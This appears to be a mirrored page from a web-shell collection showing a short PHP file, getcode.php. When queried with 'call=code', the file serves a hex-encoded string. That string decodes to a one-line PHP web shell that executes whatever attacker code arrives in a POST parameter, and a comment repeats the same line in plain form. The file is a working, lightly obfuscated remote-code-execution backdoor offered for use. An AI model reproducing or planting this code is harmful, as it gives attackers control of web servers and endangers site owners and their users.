mirror of
https://github.com/tennc/webshell
synced 2024-11-23 03:33:03 +00:00
8 lines
145 B
PHP
8 lines
145 B
PHP
|
<?php
|
||
|
//getcode.php
|
||
|
//assert($_POST[c]);
|
||
|
$cmd=$_GET['call'];
|
||
|
if ($cmd=='code')
|
||
|
echo sprintf('61737365727428245f504f53545b635d293b');
|
||
|
?>
|